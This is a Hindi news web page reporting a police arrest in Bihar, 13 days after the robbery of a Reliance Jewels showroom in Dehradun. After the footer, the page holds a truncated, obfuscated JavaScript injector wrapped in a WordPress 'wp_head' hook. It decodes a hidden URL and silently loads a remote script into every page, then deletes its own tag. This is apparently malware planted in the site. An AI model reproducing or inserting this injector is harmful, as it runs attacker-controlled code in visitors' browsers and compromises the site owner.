Saturday, July 27, 2024
spot_img

रिलायंस ज्वेल्स डकैती कांड: 13 दिन बाद पुलिस को मिली बड़ी सफलता! घटना में शामिल एक बदमाश गिरफ्तार

रिलायंस डकैती कांड में पुलिस को आखिरकार बड़ी सफलता हाथ लगी है। पुलिस ने घटना में शामिल एक बदमाश को बिहार से गिरफ्तार किया है। यह वही बदमाश है जो फुटेज में बैग में जेवरात भरता दिखाई दे रहा था। पुलिस ने चार अन्य बदमाश भी हिरासत में लिए हैं। गिरफ्तार बदमाश का नाम अभिषेक उर्फ अखिलेश उर्फ गांधी है। एसएसपी अजय सिंह ने बताया कि घटना में कुल पांच बदमाश शामिलथे। इनमें से चार शोरूम में घुसे थे। जबकि, एक बाहर खड़ा था। उन्होंने बताया कि वह भी बदमाशों से पूछताछ और टीम का मनोबल बढ़ाने को बिहार पहुंच गए हैं।

बता दें कि नौ नवंबर को राजपुर रोड पर हुई इस बड़ी डकैती के मामले में पुलिस अब तक मुख्य आरोपी के रिश्तेदारों और साथियों तक ही पहुंची थी। साथी भी बैकअप टीम के सदस्य बताए गए थे। किसी ने मदद की थी तो कोई मदद के लिए अब देहरादून पहुंचा था। लेकिन, पुलिस की कई टीमें अब भी बिहार और इसके आसपास के राज्यों में दबिश जारी रखे हुए थीं। इसी बीच बुधवार को पुलिस के लिए राहत भरी खबर सामने आई है। पुलिस कप्तान को जैसे ही इस बात की सूचना मिली वह भी बिहार के लिए रवाना हो गए हैं। बताया जा रहा है कि बिहार में पुलिस और प्रशासन से समन्वय स्थापित करने के बाद ही इस बदमाश को देहरादून लाया जा सकता है। बता दें कि अभी तक पुलिस ने इस गैंग के दो मददगार और प्रिंस के एक भाई को गिरफ्तार किया है। आरोपी अभिषेक बंगाल के रायगंज में भी घटना में शामिल था। यह घटना रिलायंस के शोरूम में गत अप्रैल में की गई थी। इन बदमाशों को देश के चार राज्यों की पुलिस कर रही थी। पहली बार किसी राज्य की पुलिस टीम ने इस गैंग के बदमाशों को इतनी बड़ी संख्या में गिरफ्तार किया है।

 

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>